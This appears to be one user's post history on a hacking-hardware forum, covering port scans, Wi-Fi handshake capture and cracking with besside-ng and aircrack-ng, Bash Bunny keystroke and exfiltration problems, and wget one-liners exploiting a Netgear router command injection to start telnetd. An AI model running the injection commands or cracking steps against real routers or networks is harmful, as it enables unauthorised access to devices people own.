anode

Posts posted by anode

  1. On 2/27/2019 at 12:36 AM, PoSHMagiC0de said:

    Lol.  That was a hilarious blunder.

    I don't have a rooted phone for this device. 😑

    Might be able to use an Orange Pi, ODroid or the like with Android installed.

  2. 5 minutes ago, icarus255 said:

    Ah please, I scan from my home all day, every day. If he can hack my computer from a scan, I'll give him 10 points. I'll even leave the pc running a little while longer. It's no different to him just picking a random IP address and giving it a go.

    And asking security focused people.

  3. 7 minutes ago, icarus255 said:

    And:

    5222/tcp open xmpp-client?

    But I am not sure what you are going to be doing with these open ports. Just because they are open doesn't mean they are vulnerable, but anyway keep us posted with this journey. I hope you get your income back, bro 😉

    I think xmpp recently had a long running vuln discovered.  (If that is what is actually running on 5222)

  4. Since just a basic browse shows a blank page, how are you losing income?

    Looks pretty standard: web, mail, and dns

    Not shown: 65525 filtered ports
    PORT     STATE  SERVICE
    53/tcp   open   domain
    80/tcp   open   http
    110/tcp  open   pop3
    143/tcp  open   imap
    443/tcp  closed https
    465/tcp  open   smtps
    587/tcp  open   submission
    993/tcp  open   imaps
    995/tcp  open   pop3s
    8000/tcp closed http-alt

  5. Maybe?

    ping -c 1 website.com

    If you want all the open ports

    nmap -p- website.com

    (will only do TCP ports. I think -sU does the UDP)

    Do keep in mind that many websites may 'share' the same IP address on shared hosting. 

  6. Look at your router/modem's WPS settings.  You may need to change them, so the client can initiate the exchange.

     

    Or, non-WPS: besside-ng (from aircrack-ng) to get the 4-way handshake, then into aircrack, JtR, hashcat, etc.

  7. I'm probably going to do a bad job asking this but.....

     

    Can one configure sshd to only connect with clients that already have the key in known_hosts?

    i.e.: Not offer the server's public key to the client on first connection.  So if the client doesn't have the server's public key, it just gets a connection refused.

    This would be linux; raspbian or kali on a Pi. (server)

  8. Have issues with exfil.

    Copying about 450 files totaling 150MB *always* fails.

    Whether by script/payload or just mass storage drag-n-drop.

    When by payload it does a self eject with the typical OS warning.

    When by D-n-D, it just hangs after about 15MB. (have to yank out)

    Bunny gets rather warm too.

    (Mac OSX is the host PC)

  9. 32 minutes ago, LowValueTarget said:

    I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. 

    Try putting your quack strings in a text file and using `QUACK keystrokes.txt`

    Yup that was it.  Saw another post, but it didn't sink in as to why.

    Makes sense now.  Thanks!

  10. For some reason when I quack a ~/ it is played back as /root/

    ~/ works fine manually typed in a terminal

    I tried a simple just quack it into text editor and same results; /root/

    MAC OSX 10.9 Mavericks.

    edit:  Just tried on a Kali laptop same results.

    Both machines bare iron, not VMs.

  11. 18 hours ago, CuppaTea said:

    To use the battery as a failover device, and charge it when not in use, you just need a couple of diodes and resistors. A voltage regulator is also a good idea.

    The only concern I'd have with a small battery is finding one which can provide the required power but if it's possible to find one which could be built in without making the case bigger, it would allow the Bunny to be used in plenty of other attack scenarios. 

    Not if lipo.  They need special charging.  Plenty of chips out there that do it.

  12. This was one of my first thoughts.

    I was thinking just a coin cell battery to boot it, then plug in/attack.  Doesn't need to run it for long.

     

    But for v2.0, how about a usb port out the back for battery, wifi, ethernet, etc?  And the battery could/should be pass through.

  13. On 2/23/2017 at 6:09 PM, b0N3z said:

    I don't think they are going to update aircrack until openwrt has.  Also site survey, while great and easy, is not always accurate and sometimes tells you it has a handshake and when you check the handshake aircrack says no handshake.  Almost better to run the commands manually.

    Actually it is updated, if you use opkg. (but problem still is there)  And it has a working besside-ng!  Made a *very* crude/kludgey alpha module for it.  (is there anything before alpha?)

  14. Been playing with Site Survey module and pop over on SSH and run

    aircrack-ng <capfile> -J <hccap>

    And it seems to run OK.  But over on the hashcat rig (3.20 Ubuntu server 16.04.1) it fails with an incorrect eapol length.

    Copying the cap file over to the hashcat rig and using AC (v 1.2 beta 3) there works perfectly.

    The Nano's AC version is 1.2 rc2

    (my kali box is 1.2 rc3, which also works)

  15. I've swapped around the single double quotes in all sorts of combos.

    $IFS as a shell variable.  It's equated to a space. (on both systems)  It works *perfectly* inside a web browser.

    I'm trying to get it to work with wget or curl.

    Getting telnet running on default port 23 is no prob.  But would be nice to add arguments and options to do a 'killall'

     

    (and I *do* thank you for all your help (globally here).  You're a good/helpful guy here.  ...When digininja speaks, hackers listen  (old US inside joke))

    33 minutes ago, digininja said:

    I think there is a translation issue, do you mean variable?

    If you do, then using single quotes means the local shell won't treat it as a variable.

     

  16. Thanks!!  Been messing around with quotes, and made some progress.

    wget "-IP-/cgi-bin/;telnetd"

    This works great.  But once I try to add/stack it fails.

    The $IFS (space) matches on both the host and target

    21 minutes ago, Jamo said:

    Wrapping it in single quotes might help; now the shell considers the `;` as being part of the local shell command, not the wget/curl

    
    wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'

     

  17. Been playing with the command injection vuln on the Netgear routers.  Works great from a browser.

    I just have no chops with wget/curl. And would like to exploit via command line.

    I've tried:

    wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23'

    I've even tried lynx but no love there either.

    Cool.  So it's the semi-false thick hard to bend wire claim.

    Yes, 10 gauge THHN solid is stiff, but 000 welding cable is rather supple.  It's not the gauge, but the number of strands (and their individual diameter) along with the insulation.  (think drone/RC silicone wire)
